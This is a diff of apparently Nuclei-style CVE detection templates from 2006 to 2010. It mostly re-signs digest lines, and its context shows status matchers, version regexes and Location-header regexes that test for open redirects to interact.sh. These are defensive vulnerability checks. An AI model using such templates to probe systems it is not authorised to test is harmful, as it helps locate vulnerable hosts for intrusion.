+45,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4a0a004730450220782d2b8bf481a5915e9c1718c67324b49b8433b1210b910742cd305d0111df63022100840add217ef0fb886c242f1eb329ce349c23c94430c6ec8a74e9f1c887447cc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bad1415000d9c5decd3270a2f82a50046c87bade9cd7d0bdbdaa40ef258f537a02204ba93c8130015b87f275475c175389bf3b230381d099d0c5d084f48c9b46c357:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2006/CVE-2006-2842.yaml b/http/cves/2006/CVE-2006-2842.yaml index 009068efb5..13ff7bbbf0 100644 --- a/http/cves/2006/CVE-2006-2842.yaml +++ b/http/cves/2006/CVE-2006-2842.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022046dd195f5bf5c276dfb90ef3d9f60f781ae43dab2e02f44963a570ff60e6ea73022001f681cdc292f9f50598231358201650a5333381d856d0c35452e7a9acd3f29a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206124e5c3a66ccbc824bf36c3a88b9d5ebbecb791b01bdf0f16ae403c057405a402201d902bd26db48d7aefe3ea9dd0461c2ae67d37fefd2af9f0bc4788d6d8314536:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-3010.yaml b/http/cves/2007/CVE-2007-3010.yaml index a6fb965688..54dfe7435b 100644 --- a/http/cves/2007/CVE-2007-3010.yaml +++ b/http/cves/2007/CVE-2007-3010.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022077daea5464ae2c99ee724324391edfccb837ce48fc24759bfc0a8aff476eefe8022063a85e8dfe57da9183ac569780803037bd4ac032588a70173d036f1660ae7caa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d5461b90f1703401d218da417966d156cdb851795019deb78cd43f70cb07ec6a022022e64196d18c50c25a32ba8e5bc6b0590867add3e6c725cae45d9cabf536f139:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-5728.yaml b/http/cves/2007/CVE-2007-5728.yaml index 24f9121dbb..13dafce379 100644 --- a/http/cves/2007/CVE-2007-5728.yaml +++ b/http/cves/2007/CVE-2007-5728.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100be74cafeaf1d2052ae0a174926f0ffe1b73654dc73480253d26a6251d5a9f639022008e2f87389adf996c0386c4484fc3c007a8584f746fd2fc854c5d12bcd997ff1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100953dd54d966440da191127014e76b95981750331f9e3cae028138f6ab2d282e2022020180747ba4e68e033bb63c310e7a3b785f2b329d481c0168ae14b3078ba3027:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-1061.yaml b/http/cves/2008/CVE-2008-1061.yaml index 6f5363d6e1..c7bc9d6f7e 100644 --- a/http/cves/2008/CVE-2008-1061.yaml +++ b/http/cves/2008/CVE-2008-1061.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009752c4040553333fe8225f67c3bc673afda408ff88de0319cd2b4a0bd4e7333f0220229dc9371a4b7635f2215c334754bca5387a8624d5a5f7f9476a21049803b04b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220330d8282048986ad674ffabf575c5c526bea21d888f71c7a3269291cfb5611f002201f866680d220a7d5c2de7d32f2b9df9047a2b46b72a38c5c49c22fefca690aa8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-1547.yaml b/http/cves/2008/CVE-2008-1547.yaml index ce685b89f6..5331f3db50 100644 --- a/http/cves/2008/CVE-2008-1547.yaml +++ b/http/cves/2008/CVE-2008-1547.yaml @@ -51,4 +51,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a0047304502210080e5ce4002e9f78ace8bc34bbc70638c4d349900438da431a2757afcb531657002203ab47f7e35668fdae30c9a1dd0dabb91bae39cfafb7a502764f1517d3e3aa8e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100adb698e8a7df0b652e70fc7ce8dee9cd47911b4491e600b4315c4fc54d7e35290221008a66a93ed217d258e21cbd4121243d454487a5284fab8a50e16829c4916d71f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-5587.yaml b/http/cves/2008/CVE-2008-5587.yaml index 02dc427002..8782704ff4 100644 --- a/http/cves/2008/CVE-2008-5587.yaml +++ b/http/cves/2008/CVE-2008-5587.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100912e1228880396cbbedb45de0a602506bea640e6cd8aaa621d0ec6707414e7c30220267eb7b0e7a3731120937298835fa180c09e4f109d5ef5a053292b64c87d6af7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f87c132a84be464e4ff4d2f737508ae0e9b62dd9ee5325ac51ea7797fd09b2ff022100b54e03be142a263440bb6e10c71884a056400c7224422ad9e395c17f30de84d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6465.yaml b/http/cves/2008/CVE-2008-6465.yaml index 9b6d674098..0091d9c745 100644 --- a/http/cves/2008/CVE-2008-6465.yaml +++ b/http/cves/2008/CVE-2008-6465.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022003fe39b5f5c4f14f5a4304fb88ee5233a61a6c4f8320e5ed5ed9cebf70ec20700220790cbb99fc446d59496ddf0e749f6c03fd0d0f9063d1d14442acabade84e4da0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202f5d9bbda9c856d7eac18bbe866eb3249138a90a0b6b072b3cb11cd24f4afb7102201d8c97f30783c811f77802a6f6e66471e8bc85afe7df1a619f756c7437dba8e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6982.yaml b/http/cves/2008/CVE-2008-6982.yaml index 2dd76ed994..7d896efb1b 100644 --- a/http/cves/2008/CVE-2008-6982.yaml +++ b/http/cves/2008/CVE-2008-6982.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 500 -# digest: 4a0a00473045022100930ae1e3a335eff7b78c478fd3c7f1177b65130a6d6b2b00ff6507a2c29d87900220537ba82e9274860321609d107916524e805cd669e6949ae5fce2998f92e135f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022027a8cf1c11d0200d01ff1f3ec4cadaca8a477a1e053fc1989ecd7709dd0d0d9e022069a08c26d868ec16a203e0942b4ceb19bf20865148cc26f5a82e14c37ed74d5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-7269.yaml b/http/cves/2008/CVE-2008-7269.yaml index 86be48dde0..f60e74f353 100644 --- a/http/cves/2008/CVE-2008-7269.yaml +++ b/http/cves/2008/CVE-2008-7269.yaml @@ -41,4 +41,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4b0a00483046022100b344e52e7ae31d77fb3af98c4d5022974a0aae7db6fa748c2ead62c71aa1f2ad0221009db6268e719957315f53a9c94d7d9bcce96fdca4bd6a7197b85d1bed428969a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206cfd3ce47bdd3c6cbf2fdd81c29180bd8f8f05e9b31f1d8f0c7a02b9d2ed0f52022100f8e324955cf0e9c6d7a0de24bcde29fd750c959594a8b5b8f600c7d5b999d232:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-1151.yaml b/http/cves/2009/CVE-2009-1151.yaml index 39895ba5ff..9439094c23 100644 --- a/http/cves/2009/CVE-2009-1151.yaml +++ b/http/cves/2009/CVE-2009-1151.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bcb661005ec46d39a8b90cca079e6e94bcdfcd7cc10b0b4b21a007623a914cdc02200aedd6c2f81799c703ef979fe9ab6d86b014ea31fb9ae6c244b1688f3248ac39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022100a8d6e9a49ac8d0da85dbed87672790d2f8a014822675fe55570c8d0bc2210b48021f211085a76ddc4b59e7fdd55ab10f9a08177239563572624260f092f88fb0d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-1496.yaml b/http/cves/2009/CVE-2009-1496.yaml index bfb5193114..b788da8d29 100644 --- a/http/cves/2009/CVE-2009-1496.yaml +++ b/http/cves/2009/CVE-2009-1496.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220058c6301672453287635b209959b9ac18463e075a84677673e28deef2283f91a0221009ef0ec653e81bc72e2c7d58deff90a7f85cba1e35851c7a2ae9f20d1d9ff24d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207f025736c4a522bd94ac5a9ecea90933348c2449f39cbff870c610fd6007e3aa02203ab7631a7d49d49ddcdcaee2eeae6f0a871096742f54d72499cbc2be9077874f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-1872.yaml b/http/cves/2009/CVE-2009-1872.yaml index 09cdaa2871..8e4de816ec 100644 --- a/http/cves/2009/CVE-2009-1872.yaml +++ b/http/cves/2009/CVE-2009-1872.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203366821ed2b22b2b05bab6a493a7c7c5db231fd6a6d80f9202908b447721a0b3022100dcfc043de885b54179a0e02dfbb7a4e986a33db1f9ef2f0cbd346b21ba783e65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207abc6420788f38cdf43dd960af68f3052a5eb599b29f3002f9f9067ebc6882ae0220552bfc0a0397fe0f49a889b8aa4cecc89dbc714e016aaff5c69a8122a4734264:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-4202.yaml b/http/cves/2009/CVE-2009-4202.yaml index 503b926355..acf996263a 100644 --- a/http/cves/2009/CVE-2009-4202.yaml +++ b/http/cves/2009/CVE-2009-4202.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100efe6e513aba3433f4ab0e1ef88eef287e7ee05c7abf8fb8ab86be22812dacaf002202412942f6b20de9136e4cd40ec9fcecc068f4830dc2e06810835f8d32346850a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022044fc59647921ae246b7de0555de2a1c11877a783041099b578b92e397a07c79d022021f6a35647edd8212110c1017e4960dd601614859682c69173f2c6dcca9173ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-5114.yaml b/http/cves/2009/CVE-2009-5114.yaml index 4c3348b407..8921da3f7b 100644 --- a/http/cves/2009/CVE-2009-5114.yaml +++ b/http/cves/2009/CVE-2009-5114.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205f1bc3fae0095bf323e677c3c93b6cdb42d839f3084ee12f9fe92a0dab609269022100b70a69e966f2e410ba5d8ed821edf339feb20ee4149b37bd66992153e4a341ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cd47a2863b26749712c2a6dc10751c67722890228bfe2e440cbb5f791ff845a7022064315ce0626de27f7d31105d98aa58879aef1c16969e08b6d35c45bc2b11e8ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0157.yaml b/http/cves/2010/CVE-2010-0157.yaml index 9bc5fbd1c1..769add0531 100644 --- a/http/cves/2010/CVE-2010-0157.yaml +++ b/http/cves/2010/CVE-2010-0157.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b15ae99c1d3ca2f1233aaf0e788295b69ad7e6ae16c2b9fba81288856eb9a80d022100c80b87d9c65025ddf0900359653ba13d0908fe452d36752aa801ad1e761dcf47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c4d28687b4669984fd7a6494440e35f1bdc5540a253c81a50eda9363af82f06c0221008c9916ea5e9328294b16e9ddf26f141418225f0ad0a5dedfc60c672e84e2d2f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0219.yaml b/http/cves/2010/CVE-2010-0219.yaml index 3d06d8decf..4457aa2513 100644 --- a/http/cves/2010/CVE-2010-0219.yaml +++ b/http/cves/2010/CVE-2010-0219.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022022201edc111a0f266f0cf4c0d27ad5fab474e474c3089690ad2ced0012bfaaa5022100e9a88bf679f5d29f8d752596eb8e02f41fc06863def5fadeea4f4aa13a50c2c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b202ff112ac09598ca6e373881d17b8a249a5398bf3a267b590ef948c91b8df2022015efa111b4715764807e6ae1c1516711d3d38d0a73835b1bbda2b1b7cf910854:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0696.yaml b/http/cves/2010/CVE-2010-0696.yaml index 6c3c0bad7b..4bd0462920 100644 --- a/http/cves/2010/CVE-2010-0696.yaml +++ b/http/cves/2010/CVE-2010-0696.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022062ed8cccf9ce298ba49005eb279ab8323d07a0560df9ee8857a3d007a3468fd6022025dbbd9a0d7b3ef88719e19a69fbb605dc7e77c1b087598f560b22547b2431d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220464645abae4d8bf812250b99a067483d22e89e09e5dafba7264b2d8d30900755022100c44339a7f47c1c7bdea6ba01152c037b2712977dab3d12e99aa1f9fa5d945493:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0944.yaml b/http/cves/2010/CVE-2010-0944.yaml index a982982ba5..e77376b28c 100644 --- a/http/cves/2010/CVE-2010-0944.yaml +++ b/http/cves/2010/CVE-2010-0944.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203edf2b86718735a85d6b60ac6465e0d7f9aa063bbfb985ecba7fd8a82500bcc6022100a9017abad716d08a60243fdb71aed727e1b0bc2e44c3d591e200168e9f7bc182:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008f1855af5bb1a227548d57889794aa0e4980ed4ad2d957a76ddae12c2637d95a02204db4794c8d6b70b3353904e9c69d9c72140784e582490844f39f61760ba387cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0985.yaml b/http/cves/2010/CVE-2010-0985.yaml index a0ff1cec33..a482e064f6 100644 --- a/http/cves/2010/CVE-2010-0985.yaml +++ b/http/cves/2010/CVE-2010-0985.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bca78e57f920f69e926e7fda61bfc9c1081621b67537c840fd5c4998a6e760b6022100bd476afda728ebf5fd521130fb22289a8aa64372043a3c537b90a9b626ad34f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220121eea2f8efc9e38cb12151304aa83d5e81bff2a4cfac268f37609a74c81813f022100896e64ab8e257721c1577ef38d42c20fa3aecccddeee80a7162233267d0eb854:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1219.yaml b/http/cves/2010/CVE-2010-1219.yaml index 99cd149e3a..d65724c07b 100644 --- a/http/cves/2010/CVE-2010-1219.yaml +++ b/http/cves/2010/CVE-2010-1219.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022078e94288c545c86d3739bfc673b0cb40d9db80ede64d7de24b9bfe1562d54d01022069a099e794e1021a4404dc94821f8840fe88456b958ec238d5edee3da0c18505:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205ffa95acf55e3fc510f649eb410e4a0f892762d3b01d027aacb75dbce13751dc022100e6fab3a55f59fb921e0729c14335dd11e766109e9e85e05c40cc56d8f9173bc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1314.yaml b/http/cves/2010/CVE-2010-1314.yaml index d9ffa0d039..1f4844a4f2 100644 --- a/http/cves/2010/CVE-2010-1314.yaml +++ b/http/cves/2010/CVE-2010-1314.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009af853087a4818f3b40be3d023435dd789ec1badcb73949d41adfdfb8ffbe233022100d3bf069aa45a4e07a8ab6390cdc65d98ef6675f01ea2c12cba76b36042b91fc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207954ede2855432fd8a3e30891c30a1cf6213ba79e7d31905a775dd785c39553502203d862e5de7fc09c113afcf3796b211723a67c327466be378b9db7b34c333c531:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1352.yaml b/http/cves/2010/CVE-2010-1352.yaml index cd8af4ca6b..f7e5f98449 100644 --- a/http/cves/2010/CVE-2010-1352.yaml +++ b/http/cves/2010/CVE-2010-1352.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d337364bec15e62a5e51894f00482a853c0b83de12621326180d670fe85be2550220100fd4c82fbacc8ea7654009879641cc7e3cbbd695d9c489fe313644a3fdf818:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008a7e3cd7e255b9065d048da6375fe2195b01c6d51c4da2c2084057a83d229d170220355ee9fc688f616e74e64c8d533816e1d490390823992a02d9ee83a88e3bc765:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1429.yaml b/http/cves/2010/CVE-2010-1429.yaml index 6a39c5a97a..79ba7ce22d 100644 --- a/http/cves/2010/CVE-2010-1429.yaml +++ b/http/cves/2010/CVE-2010-1429.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220724f85157044c11062097b6d4872436522fc35cb4dcf3b20b1f10d928f1d19e3022100adad2cda8f2a65281164fc4a29c8a5d4a93992b73827a47b74c5d1a3b0065733:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044021f0371a0bff2d6fb8a4a91d31d0de9460d0b8dbc4827fa633bb7c4a52866e779022100a23c0e97b09c9bb709359301505a492d02b37f6704082040aa5450bd73c9c579:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1470.yaml b/http/cves/2010/CVE-2010-1470.yaml index de7a213dc7..7ca6737f7e 100644 --- a/http/cves/2010/CVE-2010-1470.yaml +++ b/http/cves/2010/CVE-2010-1470.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022005af39fb89c8d8753e1bcb87009d6d4d1de2cb594ed2c7fd92db1d9971237aeb022100bec720c951ec411c59b60dbf4113ab4a22c3e29ca90e8e253aab3e7e0dec4e37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100da2c19c6c73f18f693a3f5738f94bd48ed8ea32318f948b347002daf22d5829a022100b1f9023b6aeafe5c201d51a5d173269fb99e5659fa8fd4586f6cc0e42b1ae457:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1475.yaml b/http/cves/2010/CVE-2010-1475.yaml index e4bb02c47e..322c4a4a22 100644 --- a/http/cves/2010/CVE-2010-1475.yaml +++ b/http/cves/2010/CVE-2010-1475.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b79b632e011312d4f390807f69c5a574e87dd7c7f8e5645c0084a40ac2aaf84a0220638374eeade62a6c858f74603e82a9ff1c3f522a73e5268cfce3425a2bd72ae6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205844fcb24ca826bfe720aa9c1f799ffcca234c2c4a537d6d4056f28e3425dd98022100af243d3db9445e19d89159b5af1a765b069d2b807e3e48c98cfb3b27424fd806:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1531.yaml b/http/cves/2010/CVE-2010-1531.yaml index 17455eef2b..bc02bd8ff5 100644 --- a/http/cves/2010/CVE-2010-1531.yaml +++ b/http/cves/2010/CVE-2010-1531.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e5477149f1e34b88e3dd7d962a23c967bc272e94ffeae18055a5a80d9e051cc602210086357c7ed36299ed6887410f4e2b5c11f76dc8fc2ad89d7197281be08c89e9e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d153a797968de780071b765fc449d9036716aa8aabe6d3a20828a24643b592a7022100ca3ed2b9f6e724cf5b3833c1539d60175b10fc82b7dbf18e3ad5fa11d7fdb0c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1601.yaml b/http/cves/2010/CVE-2010-1601.yaml index b3d99ecc70..a044a04067 100644 --- a/http/cves/2010/CVE-2010-1601.yaml +++ b/http/cves/2010/CVE-2010-1601.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210097b2518e36f765bf1859fe172670ecd77886665cb539f4379bb250f6b6984e6a02207707d1856286f12c7923bf67ba75f1dcc7cc704a1603b96a498ca5e75ed2dbb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203a5d4d3c01f9d5de6051deb8eb637e37c43ec48f37b679bea23ad125ef151d5a022031d19b5068b2be4e64980b85a51911c855eeedb0a1a916d75e0bfbcd8c1b94c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1603.yaml b/http/cves/2010/CVE-2010-1603.yaml index e5b89969c0..ca49678242 100644 --- a/http/cves/2010/CVE-2010-1603.yaml +++ b/http/cves/2010/CVE-2010-1603.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022054c49fc7d9cd0665b02bdd1416c1510b1752a4f06b6591edf9975587dbd9f87102202a6ac32dc8f19d3831f4ecb72f8145c38a2992e9219593c3b2d5ad99f3f36663:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b03cc1e6db4e62a042027fd52f75ce21fe57b02733b7c65eefba22966b2543ac022013e7947c1ed20184adbc8d931484553026dc0c8a63229e3974c3aace3c527502:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1719.yaml b/http/cves/2010/CVE-2010-1719.yaml index 22a4cc07ea..a8d48822f3 100644 --- a/http/cves/2010/CVE-2010-1719.yaml +++ b/http/cves/2010/CVE-2010-1719.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100efdd3798466d640e256d5a756ee7b624ed3eb6e4e1eff2d6307ab2bac89b607c022057069d8f4c691f3e6f4948c0d8355e3f992e8ff17c66ed10eec31c3abe925c60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204e0f92e7e1c35d6f80777dfd955af6777db5ac457b8f53c4342ca66a8db9ff6302201d0c74a5c1b6941dd9c112ef0739d516ba4dae634906b569d7e8dcd9c97a7330:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1870.yaml b/http/cves/2010/CVE-2010-1870.yaml index afe80d3941..84558be2da 100644 --- a/http/cves/2010/CVE-2010-1870.yaml +++ b/http/cves/2010/CVE-2010-1870.yaml @@ -51,4 +51,4 @@ http: - 'LISTSERV Maestro\s+[5678]' - 'Administration Hub 9\.0-[123456780]' - 'Administration Hub [5678]' -# digest: 4a0a00473045022100e541bad52cababb6cd2cd61c1b26ab8feaae117ccf9c87d10f7c588ca5d3156202204c61984cd595f1fb51216ffaccaa7ca4e2cca292526bf62b42ccb8aaf95821f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220011167dfff94820a6627ef47c2dc8c4e762e0a9a665ed00189fe142b7ad351f202207cc948bfc45395da792c6c5bd5e4c9cbf860f293155925e9e063de56ef236028:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1875.yaml b/http/cves/2010/CVE-2010-1875.yaml index fdaa4166f1..67832fdc7c 100644 --- a/http/cves/2010/CVE-2010-1875.yaml +++ b/http/cves/2010/CVE-2010-1875.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201680f40e20b2858e86788424a8a44bc6958af8559d3f80c705f1af1c7035951c0221009efb7b9e0216197bd0463ed5285897d4212bdd853eab1b1e11ac3a3ef59792b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c7924052921ccd115c3e7f4b89b1d61ef082cb6e9cd7711eb66d7691a2d7cfe7022100ca66094ffe917a58618599af1d573c56619f1a976252054f12604523672789e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1981.yaml b/http/cves/2010/CVE-2010-1981.yaml index c668fb5d97..eae9eb76ae 100644 --- a/http/cves/2010/CVE-2010-1981.yaml +++ b/http/cves/2010/CVE-2010-1981.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100eb093037fb061176dd3b11eb61772ebd05a8d5e6b7b77b7c78f9e104162f8085022100d573cfc124ecec2594c14755043485055a53bf9712c250c00c5bfcacabe64cee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100808d072b688a3b3ea4d04558291a5e08c4675e3eeeb07213dfedd29ef0c1c9f0022067528ebbbb4fa1b6fca937a8be9cd70474980c75469e958e712636b5e69b9818:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2035.yaml b/http/cves/2010/CVE-2010-2035.yaml index 6bd6723fef..a646f8aa04 100644 --- a/http/cves/2010/CVE-2010-2035.yaml +++ b/http/cves/2010/CVE-2010-2035.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cb5ec476643b95c64caa86cc061308c75ceace843e58db8bae08413f2160846602201dc89742c9b1a55df817ec772150de1c14e53494415f3a1e177701a94db23fb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022073386e346d2a0f6d5672382eb52edf74cc67278b7df1e5861b21e480b26173240220794a4a4a638ba7dca2c358a68f74cb8665b51531bff972997c5ac470e0344cf8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2128.yaml b/http/cves/2010/CVE-2010-2128.yaml index 37283f304a..fa599ca328 100644 --- a/http/cves/2010/CVE-2010-2128.yaml +++ b/http/cves/2010/CVE-2010-2128.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e59aa470d7b6c5748d0e63fffbaa81a4831047b347273d58d3cb41ca77557c13022100ac7540e4284e4eab9793f192e0dea83d7673f2050021711441c420f87797fa77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022049543a3ccb3af025c6c9f56d485b2dae14902733e0301b1bac45483c4fa40fa10220274a33f7be26019e841a1286e2a1f556fa30cd9088e619bd725f572895b2ee64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2307.yaml b/http/cves/2010/CVE-2010-2307.yaml index 72c48811af..884d4fcd1e 100644 --- a/http/cves/2010/CVE-2010-2307.yaml +++ b/http/cves/2010/CVE-2010-2307.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bbfdf3607b6347ba7d7420f35506f8f2cff5bcb10afcb6d67570bbc874f0ea98022100e12d0a6af4937bca526ed8962cf3d20fcdfde6f0e14e2153b2f73251c35b4125:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220598127be060bb67785f5bbc627e11b7d715ca64009de5eb572e823ff9bf7baa8022100cfe8b0280087e065a478af5f5b7eb691406bea8e63a1ff22dc87086707b84840:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2857.yaml b/http/cves/2010/CVE-2010-2857.yaml index 7dd9f3c1fa..5279fc55d7 100644 --- a/http/cves/2010/CVE-2010-2857.yaml +++ b/http/cves/2010/CVE-2010-2857.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a9df18c9b0d35866ea9765eaa67e92c811c401ee47b98f0ed80b8b20d1e61999022100bf0763eb2da8ee0ea76eaa0be32e72d2298820a16dbe45c9d2318c35b5cb37de:922c64590222798bb761d5b6d8e72950 \ No newline at end of 